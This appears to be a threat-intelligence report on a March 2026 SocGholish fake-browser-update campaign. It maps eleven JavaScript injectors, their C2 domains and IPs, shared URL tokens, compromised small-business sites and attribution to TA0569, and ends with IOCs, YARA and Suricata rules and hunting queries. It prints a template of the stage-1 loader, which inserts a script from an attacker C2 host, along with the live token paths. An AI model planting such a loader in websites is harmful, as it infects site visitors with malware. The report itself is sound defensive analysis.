SocGholish March 2026 Wave: 11 Injectors, 6 C2 Domains, and the Shared Campaign Tokens That Linked Them All

TL;DR: A coordinated SocGholish (FakeUpdates) campaign wave launched 2026-03-02 deployed 11 stage-1 JavaScript injectors across 6 distinct C2 domains hosted by 4 providers spanning Panama, the United States, and Canada. Analysis of base64 campaign tokens embedded in the URL paths proved that multiple domains resolve to a single backend infrastructure -- a token reused across 3 domains and 4 samples was the lynchpin. The actor compromised 4 legitimate websites, obtained wildcard TLS certificates just 2 days before go-live proving DNS-level control, and parked one C2 node in a Panama /24 shared with Tor exits, underground forums, and a cluster of suspicious analytics domains that may serve as the SocGholish traffic distribution system. The operation is attributed with HIGH confidence to TA0569, the initial access broker that sells footholds to Evil Corp affiliates and ransomware operators.

---

Why SocGholish Still Matters

SocGholish is not new. It has been operating since at least 2017. But it remains one of the most effective initial access operations on the internet because it weaponizes trust -- legitimate websites that victims already visit, browser update prompts that look exactly right, and infrastructure that blends into normal web traffic. Every SocGholish infection is a door opened for whoever is buying access that week. In 2024-2025, that meant Evil Corp affiliates deploying WastedLocker, Cobalt Strike operators establishing persistence, and NetSupport RAT campaigns harvesting credentials at scale.

This report covers an unreported campaign batch -- 11 samples, zero prior public reporting -- uploaded to MalwareBazaar on 2026-03-02 by researcher JAMESWT_WT. We mapped the full infrastructure, linked the domains through shared campaign tokens, identified 4 compromised organizations, and uncovered a suspicious analytics domain cluster that may be part of SocGholish's traffic distribution system.

The Attack Chain

The SocGholish kill chain is deceptively simple. That simplicity is the point -- every stage uses legitimate web technologies, and no stage triggers behavioral detection until the victim manually executes the payload.

[Compromised Website]         [Victim Browser]           [SocGholish C2]
       |                            |                          |
       |  1. Injected <script>      |                          |
       |  tag (stage-1 JS)          |                          |
       |--------------------------->|                          |
       |                            |  2. HTTPS GET to         |
       |                            |  subdomain.victim.com/   |
       |                            |  [base64-campaign-token] |
       |                            |------------------------->|
       |                            |                          |
       |                            |  3. Browser fingerprint  |
       |                            |  (OS, browser, plugins)  |
       |                            |<-------------------------|
       |                            |                          |
       |                            |  4. Fake "Update Chrome" |
       |                            |  overlay served          |
       |                            |<-------------------------|
       |                            |                          |
       |                            |  5. Victim downloads     |
       |                            |  "Update.zip" containing |
       |                            |  .js/.lnk payload        |
       |                            |                          |
       |                            |  6. WScript execution    |
       |                            |  -> Stage-2 (CobaltStrike|
       |                            |  /NetSupport/Python RAT) |

Stage 1 is a tiny JavaScript IIFE injected into a compromised legitimate website. It creates a <script> tag pointing to an attacker-controlled subdomain. The injector is typically 235-270 bytes -- small enough to hide in minified theme files or plugin assets where it will never be noticed by the site owner.

Stage 2 serves a browser fingerprinting gate. The C2 evaluates the visitor's operating system, browser, plugins, and likely IP reputation before deciding whether to serve the fake update overlay or silently redirect to the legitimate page. One sample in this batch (b151cd35) includes an explicit OS: Win prefix -- a hardcoded gate restricting execution to Windows targets only.

Stage 3 presents a convincing fake browser update page. The victim downloads a ZIP containing a .js or .lnk file. Execution via WScript pulls a second-stage payload -- historically Cobalt Strike beacons, NetSupport RAT, or Python-based backdoors.

The Stage-1 Injectors: 11 Samples, One Pattern

All 11 samples follow an identical structure. The only variations are the parameter names (randomized per sample), the C2 domain, and the presence or absence of a gate variable.

// Gate variable (optional): var ndsx = true; or var qwzx = true;
// IIFE with 5-6 parameters:
(function(document_ref, tag_name, url, script_elem, first_script) {
    script_elem = document_ref.createElement(tag_name);
    first_script = document_ref.getElementsByTagName(tag_name)[0];
    script_elem.async = 1;
    script_elem.src = url;
    first_script.parentNode.insertBefore(script_elem, first_script);
})(document, 'script', 'https://[C2_DOMAIN]/[BASE64_CAMPAIGN_TOKEN]');

Two gate variables appear across the batch: ndsx and qwzx. These boolean flags are set to true and are likely checked by a parent SocGholish component to prevent double-injection on the same page. The split into two variables suggests sub-campaigns or operator segmentation -- different affiliates or delivery tracks using the same infrastructure.

Some variants pass window as the first IIFE parameter (unused in the function body), possibly reserved for future fingerprinting logic.

Sample Inventory

SHA256 (truncated)	Size (bytes)	Gate Var	C2 Domain
8f896f3f0b5f3341...	262	ndsx	editions.seattlemysterylovers[.]com
2f9e5ea05aa8cd81...	270	ndsx	editions.seattlemysterylovers[.]com
b151cd35a8aa986b...	259	qwzx	clients.dedicatedservicesusa[.]com
3862b771872c705c...	251	qwzx	clients.dedicatedservicesusa[.]com
dfc159e0987ac2ea...	253	ndsx	clients.dedicatedservicesusa[.]com
77ba87f9af573806...	248	ndsx	clients.dedicatedservicesusa[.]com
fce0b35eb3fa3db0...	238	--	circle.innovativecsportal[.]com
a06b40943b4e4d40...	239	--	dashnex.plexusmarket[.]fund
d0858a2d532c8bb3...	235	--	static.twalls5280[.]com
1140b0fb86f15608...	244	qwzx	support.traininghub[.]world
436a97f14051ed97...	239	qwzx	support.traininghub[.]world

Campaign Token Analysis: The Unifying Thread

The strongest evidence that these 6 domains share a single backend comes from the URL path tokens. Each injector fetches a base64-encoded path from its C2 domain. When the same token appears on different domains, it proves they resolve to the same infrastructure.

Token (URL Path)	Domains Using It	Samples
/I8l9JljrHk9H60cUFvxRBFHrRwRLqxNHRq4MU025DklN6wA=	seattlemysterylovers	1
/vKbEo8eEp8rYhP6RiZbogc6E/oHOwKPLxsK92czIotrV3rHI1dLm3g==	seattlemysterylovers	1
/49U5SZj3WiCH9wN71uUVa5H3A2uAsFEwjaZdJo64SzvBqA==	traininghub, dedicatedservicesusa (x3)	4
/IWRDzFpGIKVFRnn+FFFv7lNGee5REzS4RQwyu1EBYbE=	traininghub, dedicatedservicesusa	2
/MkiUaUlq9wBWaq5bCnu4S0BqrktYMuYZRCD6AkQm9RtCOuwPVD76S08=	plexusmarket	1
/Cqpi5HGIAY1uiFjWPJ5OxniIWMZt2BKReMkFiHvaAJB9yBqXZtBAmQ==	twalls5280	1
/cL2QAwuf82oUn6oxR4S8IQKfqiEV2v1uB8rjaBTT+WEfz+dkUsA=	innovativecsportal	1

The token /49U5SZj3Wi... is the smoking gun. It appears across 3 different domains (traininghub.world, dedicatedservicesusa.com) in 4 separate samples. The SocGholish TDS generates these tokens centrally, and any frontend domain can resolve them interchangeably. This is a domain-agnostic backend -- if one domain is burned, the others continue serving the same campaigns.

Infrastructure: 5 Live IPs, 4 Providers, 3 Countries

Network Map

IP	ASN/Provider	Country	Domain	Status
190.211.254.31	Private Layer Inc	PA	editions.seattlemysterylovers[.]com	LIVE (stealth)
141.193.213.10	Cloudflare CDN	US	clients.dedicatedservicesusa[.]com	LIVE (403)
45.76.250.221	Vultr	US	dashnex.plexusmarket[.]fund	LIVE (stealth)
45.32.199.48	Vultr	US	static.twalls5280[.]com	LIVE (stealth)
170.75.160.84	Lunanode	CA	circle.innovativecsportal[.]com	LIVE (stealth)
N/A	N/A	--	support.traininghub[.]world	DEAD (no DNS)

Four of the five live IPs return connection timeouts on direct probe -- selective C2 response that only serves content to requests matching the expected SocGholish beacon format. The fifth (141.193.213.10) sits behind Cloudflare CDN, returning a 403 on all direct requests. This is deliberate: Cloudflare fronting masks the true origin IP and provides DDoS protection and domain reputation laundering.

The multi-provider spread (Private Layer in Panama, two Vultr instances in the US, Lunanode in Canada, and Cloudflare CDN) eliminates any single point of failure. Taking down one provider leaves 4 of 5 C2 nodes operational.

Hosting Hierarchy

Tier 0 (Upstream Providers):
  Private Layer Inc (Panama)  -- 190.211.252.0/22
  Vultr/Constant Company (US) -- 45.32.0.0/16, 45.76.0.0/15
  Lunanode Hosting Inc (CA)   -- 170.75.160.0/20
  Cloudflare CDN (US)         -- 141.193.213.0/24

Tier 1 (C2 Infrastructure):
  190.211.254.31 -- editions.seattlemysterylovers[.]com
  141.193.213.10 -- clients.dedicatedservicesusa[.]com (CF proxy)
  45.76.250.221  -- dashnex.plexusmarket[.]fund
  45.32.199.48   -- static.twalls5280[.]com
  170.75.160.84  -- circle.innovativecsportal[.]com

Tier 2 (Compromised Redirectors):
  162.241.30.122 -- seattlemysterylovers[.]com (Bluehost, legit site)
  WP Engine      -- dedicatedservicesusa[.]com (WordPress, legit business)
  Apache         -- innovativecsportal[.]com (Alpha Five, legit portal)

Certificate Preparation: The 48-Hour Window

The wildcard certificate timeline reveals the actor's operational cadence. Infrastructure is prepared 2-3 days before campaign launch -- enough time to validate DNS propagation and test C2 connectivity, but short enough to minimize exposure.

• dedicatedservicesusa[.]com: Wildcard cert (*.dedicatedservicesusa.com) issued 2026-02-28 via Let's Encrypt E7. Campaign launched 2026-03-02. This is a 48-hour preparation window.
• twalls5280[.]com: Recurring wildcard certs since 2025-09, with a specific static.twalls5280.com cert from ZeroSSL (2025-09-13). This node has been in the SocGholish infrastructure for at least 6 months.
• innovativecsportal[.]com: Wildcard cert renewed 2026-03-07 (Sectigo + Google Trust). Also has a server.innovativecsportal.com cert from cPanel, indicating the legitimate admin's control panel is still accessible.
• plexusmarket[.]fund: Wildcard certs since 2025-09-27 (Google Trust + Sectigo). Another long-lived node.
• seattlemysterylovers[.]com: No certificate observed for the editions subdomain. The actor is likely using HTTP-only or direct IP communication for this node.

The issuance of wildcard certificates (*.domain.com) rather than single-subdomain certificates proves the actor has DNS-level control over the compromised domains -- not just the ability to inject JavaScript into a web page. This is a deeper compromise than typical SocGholish web injection and indicates the actor likely controls the DNS registrar account or nameserver configuration.

The Panama /24: Tor Exits, Underground Forums, and Suspicious Analytics

The Private Layer /24 (190.211.254.0/24) hosting the primary C2 at .31 is a neighborhood worth watching. A scan of the surrounding IPs reveals co-hosted infrastructure that paints a clear picture of the provider's clientele:

IP	Hostname	Significance
.30	c4mhub[.]com	Adult content platform
.40	nulled[.]ws	Underground hacking forum
.44	wwstat[.]co	Suspicious analytics/tracking domain
.48/.164	yahoo.com (spoofed)	Apache Traffic Server spoofing Yahoo
.55/.66	*.missilesflee[.]de	Suspicious domain cluster
.76/.101/.182	(tor)	Tor exit/relay nodes
.93	maxstat[.]co	Suspicious analytics domain
.94	cdnmetrics[.]co	Suspicious CDN/analytics domain
.120	neutrinosbeat[.]com	Suspicious domain
.123	cdnscore[.]co	Suspicious CDN/analytics domain
.139	cloud-mgmt-app[.]com	Suspicious cloud management domain

The cluster of analytics-style domains -- wwstat[.]co, maxstat[.]co, cdnmetrics[.]co, cdnscore[.]co -- all in the same /24 as the SocGholish C2, is the most operationally significant finding. These domains mimic legitimate web analytics and CDN services. They may serve as components of SocGholish's Traffic Distribution System (TDS) -- the fingerprinting and conditional redirection layer that decides which visitors receive the fake update overlay and which are silently passed through to the legitimate page.

Compromised Organizations

SocGholish does not target specific organizations for compromise. It opportunistically compromises websites with known CMS vulnerabilities -- primarily WordPress -- and uses them as delivery platforms to infect their visitors. The true victims are the employees, contractors, and partners who visit these sites during normal business operations.

Organization	Domain	Sector	Evidence
Seattle Mystery Lovers Book Club	seattlemysterylovers[.]com	Community/Recreation	DNS hijack of editions subdomain to attacker IP
Dedicated Building Services	dedicatedservicesusa[.]com	Construction/Services	WordPress injection, wildcard cert issued by attacker
Innovative Customer Service (ICS)	innovativecsportal[.]com	Business Services	DNS hijack of circle subdomain, open directory listing
TWalls5280	twalls5280[.]com	Home Improvement	DNS hijack of static subdomain, recurring wildcard certs

The compromised sites span small business, community, and service sectors -- organizations unlikely to have security teams monitoring their DNS records or Certificate Transparency logs. This is by design. SocGholish targets the long tail of the web, where compromises persist for months without detection.

Threat Actor: TA0569

Attribute	Assessment
Designation	TA0569 (Proofpoint) / GOLD PRELUDE (Secureworks) / GhoLoader
Confidence	HIGH
Motivation	Financial -- initial access brokerage
Region	Likely Eastern Europe (historical attribution)
Active Since	At least 2017

TA0569 operates as an initial access broker (IAB). They do not deploy ransomware or conduct espionage themselves. They compromise machines at scale and sell the resulting footholds to the highest bidder. Known downstream relationships include:

Downstream Actor	Payload	Relationship
Evil Corp / Indrik Spider	WastedLocker, Hades ransomware	Primary customer
UNC2726 / GOLD PRELUDE	Cobalt Strike beacons	Direct deployment
Unknown affiliates	NetSupport RAT	Common second-stage
Unknown affiliates	Python backdoor (Blister loader)	Observed in 2024-2025
Various RaaS operators	LockBit, BlackCat/ALPHV	Suspected access sales

OPSEC Failures We Exploited

The actor's operational security is generally strong -- multi-provider infrastructure, Cloudflare fronting, selective C2 response, and short-lived subdomains on compromised domains. But several failures enabled this mapping:

1. Same campaign tokens reused across domains -- the /49U5SZj3Wi... token appearing on 3 different domains linked the entire infrastructure
2. All 11 samples submitted in a single batch -- enabling full campaign mapping from one researcher's upload
3. Wildcard cert issuance dates -- revealed a consistent 48-hour preparation window before campaign launch
4. innovativecsportal[.]com has open directory listing -- exposed the underlying Alpha Five platform
5. plexusmarket[.]fund redirects to dashnexpages.com -- revealed the DashNex page builder used for the purpose-registered domain
6. Private Layer /24 neighborhood -- co-hosted suspicious analytics domains suggest TDS infrastructure

MITRE ATT&CK Mapping

Tactic	Technique	ID	Implementation
Resource Development	Compromise Infrastructure: Web Services	T1584.006	Compromised WordPress/Alpha Five sites for JS injection
Resource Development	Stage Capabilities: Upload Malware	T1608.001	Stage-1 JS injector planted on compromised sites
Resource Development	Acquire Infrastructure: Domains	T1583.001	Purpose-registered plexusmarket.fund, traininghub.world
Initial Access	Drive-by Compromise	T1189	Visitors to compromised sites auto-load malicious JS
Execution	Command and Scripting Interpreter: JavaScript	T1059.007	JS IIFE loader creates script tag
Execution	User Execution: Malicious File	T1204.002	Victim downloads fake update .zip/.js
Command and Control	Application Layer Protocol: Web Protocols	T1071.001	HTTPS communication with C2 domains
Command and Control	Ingress Tool Transfer	T1105	Stage-2 payload download from C2
Defense Evasion	Obfuscated Files or Information	T1027	Minified JS with variable randomization

Indicators of Compromise

C2 Domains

editions[.]seattlemysterylovers[.]com
support[.]traininghub[.]world
clients[.]dedicatedservicesusa[.]com
dashnex[.]plexusmarket[.]fund
static[.]twalls5280[.]com
circle[.]innovativecsportal[.]com

C2 IPs

190.211.254.31    (Private Layer, Panama)
141.193.213.10    (Cloudflare CDN, US)
45.76.250.221     (Vultr, US)
45.32.199.48      (Vultr, US)
170.75.160.84     (Lunanode, Canada)

Potential TDS/Analytics Infrastructure (190.211.254.0/24)

190.211.254.44    wwstat[.]co
190.211.254.93    maxstat[.]co
190.211.254.94    cdnmetrics[.]co
190.211.254.123   cdnscore[.]co

ThreatFox-Reported Related Domains (March 2026 Wave)

files[.]jeaniescott[.]digital
login[.]craftyinkymagic[.]com
cpanel[.]grovecityhvacservices[.]com
disk[.]grovecitykitchenremodeling[.]com
feedback[.]grovecitypestcontrol[.]com
customer[.]grovecityroofing[.]com
support[.]grovecityelectrician[.]com
images[.]grovecityshoplocal[.]com

File Indicators

SHA256	MD5	Size
8f896f3f0b5f33413217e9350dba6d4958cc9bdf568902a08d739b43db6f993b	27965f46c2d16af746efeb8e1fc30025	262
2f9e5ea05aa8cd81c1c1f0914220557c5dc4a8bc42ee822bd327e3cfc3328f45	9cbad5646c877218af29fd6cc88849c4	270
b151cd35a8aa986bd6bd6f2148fd9ca37e2953e823d658c088923b49e87b4035	737fc3173073fea6d9d12ec586253f1f	259
3862b771872c705cb757d851d7714de369cbf8db548d8dcac7edcc46933045e0	e0e2a64bba76b50b433c1ae8e89a7d9d	251
dfc159e0987ac2ea946fd45fa61f81d828a5302d02d53dd7cf88cefefc79c316	5bedabab8dddaf03ee75c14e1e5c9ff9	253
77ba87f9af5738061a9e5b8b8ad3119c2896188928283112dfd0d1882a6a347d	f3ee929efd197e62d04cba85efd8fcb5	248
fce0b35eb3fa3db05e5c6532705758a8669d5bb6fc1825175c0ee67bbbd38862	bb959c89922c3ef6be5105742ea7b94f	238
a06b40943b4e4d4057756a456e7016b3eae69eeb2c4b1311ce53f5fd9dd7cefa	2e7ab628a4465e21da618eedd59bcd14	239
d0858a2d532c8bb3bdd8f98ff78c2c16da33c171815aa5c89ffeb84ee76b8cf5	2bb853e2d71d314ffc5419ca3fc80a06	235
1140b0fb86f156087d9886e61e8d0c5a3a74ce73648fda609d507e6802b9af5e	19d9d3c663fe2a147b2683895adb20a1	244
436a97f14051ed97063c9b2e12a25b0068984a0ebe164001e51615539561e64e	7e0d41fc10cfa7b0047546a932f2be62	239

Behavioral Indicators

Gate variables in HTML source:  var ndsx = true;
                                var qwzx = true;

IIFE pattern:  (function( ... createElement ... getElementsByTagName ... insertBefore ... .async=1 ... .src=

URL paths:     Base64-like tokens with = padding
               e.g., /I8l9JljrHk9H60cUFvxRBFHrRwRLqxNHRq4MU025DklN6wA=

OS gate:       "OS: Win" string prefix in some variants

Detection Opportunities

YARA Rules

rule SocGholish_Stage1_IIFE_Injector_Mar2026 {
    meta:
        description = "Detects SocGholish stage-1 IIFE JavaScript injectors from March 2026 campaign"
        author = "Breakglass Intelligence"
        date = "2026-03-09"
        tlp = "TLP:CLEAR"
        severity = "HIGH"
        reference = "https://intel.breakglass.tech"
    strings:
        $iife_open = /\(function\s*\(\s*\w+\s*,\s*\w+\s*,\s*\w+\s*,\s*\w+\s*,\s*\w+\s*\)/
        $create = "createElement" ascii
        $gettag = "getElementsByTagName" ascii
        $insert = "insertBefore" ascii
        $async = ".async" ascii
        $src = ".src" ascii
        $gate1 = "var ndsx" ascii
        $gate2 = "var qwzx" ascii
        $c2_1 = "seattlemysterylovers" ascii nocase
        $c2_2 = "dedicatedservicesusa" ascii nocase
        $c2_3 = "plexusmarket" ascii nocase
        $c2_4 = "twalls5280" ascii nocase
        $c2_5 = "innovativecsportal" ascii nocase
        $c2_6 = "traininghub" ascii nocase
    condition:
        filesize < 500 and
        ($iife_open and $create and $gettag and $insert) or
        any of ($gate*) or
        any of ($c2_*)
}

rule SocGholish_Generic_IIFE_Loader {
    meta:
        description = "Generic detection for SocGholish IIFE script injection pattern"
        author = "Breakglass Intelligence"
        date = "2026-03-09"
        tlp = "TLP:CLEAR"
    strings:
        $iife = /\(function\s*\(\s*\w{1,3}\s*,\s*\w{1,3}\s*,\s*\w{1,3}\s*,\s*\w{1,3}\s*,\s*\w{1,3}\s*\)/
        $create = "createElement" ascii
        $tag = "'script'" ascii
        $insert = "insertBefore" ascii
        $async = ".async" ascii
    condition:
        filesize < 500 and
        all of them
}

Suricata Rules

# SocGholish -- March 2026 C2 domains
alert dns any any -> any any (msg:"SOCGHOLISH C2 Domain Lookup (Mar 2026)"; \
  dns.query; content:"seattlemysterylovers"; \
  sid:2026030901; rev:1;)

alert dns any any -> any any (msg:"SOCGHOLISH C2 Domain Lookup (Mar 2026)"; \
  dns.query; content:"dedicatedservicesusa"; \
  sid:2026030902; rev:1;)

alert dns any any -> any any (msg:"SOCGHOLISH C2 Domain Lookup (Mar 2026)"; \
  dns.query; content:"plexusmarket"; \
  sid:2026030903; rev:1;)

alert dns any any -> any any (msg:"SOCGHOLISH C2 Domain Lookup (Mar 2026)"; \
  dns.query; content:"innovativecsportal"; \
  sid:2026030904; rev:1;)

alert dns any any -> any any (msg:"SOCGHOLISH C2 Domain Lookup (Mar 2026)"; \
  dns.query; content:"twalls5280"; \
  sid:2026030905; rev:1;)

alert dns any any -> any any (msg:"SOCGHOLISH C2 Domain Lookup (Mar 2026)"; \
  dns.query; content:"traininghub.world"; \
  sid:2026030906; rev:1;)

# SocGholish -- Potential TDS analytics domains in Panama /24
alert dns any any -> any any (msg:"SOCGHOLISH Potential TDS Domain (Panama /24)"; \
  dns.query; content:"wwstat.co"; \
  sid:2026030907; rev:1;)

alert dns any any -> any any (msg:"SOCGHOLISH Potential TDS Domain (Panama /24)"; \
  dns.query; content:"cdnmetrics.co"; \
  sid:2026030908; rev:1;)

# SocGholish -- C2 IP direct connections
alert ip any any -> [190.211.254.31,45.76.250.221,45.32.199.48,170.75.160.84] any \
  (msg:"SOCGHOLISH C2 IP Connection (Mar 2026)"; \
  sid:2026030909; rev:1;)

Hunting Queries

DNS/Proxy Log Hunting -- search for any connections to the 6 C2 subdomains or base parent domains. Also search for the base64 URL path patterns with = padding in HTTP request URIs.

Certificate Transparency Monitoring -- set alerts for new certificate issuance on all 6 domains. A new subdomain certificate (e.g., mail.dedicatedservicesusa.com) would indicate the actor is expanding or rotating C2 endpoints.

JavaScript Content Inspection -- search web proxy logs or WAF telemetry for the IIFE injection pattern: createElement + getElementsByTagName + insertBefore + .async=1 appearing in responses from external websites, especially when the total script block is under 300 bytes.

Network Neighborhood Monitoring -- monitor the 190.211.254.0/24 range for new SocGholish infrastructure. The analytics-style domains (wwstat.co, maxstat.co, cdnmetrics.co, cdnscore.co) in this range should be added to watchlists as potential TDS components.

---

Published by Breakglass Intelligence. Investigation conducted 2026-03-09. 11 MalwareBazaar samples analyzed. 5 live C2 servers confirmed across 4 providers and 3 countries. 4 compromised organizations identified. Classification: TLP:CLEAR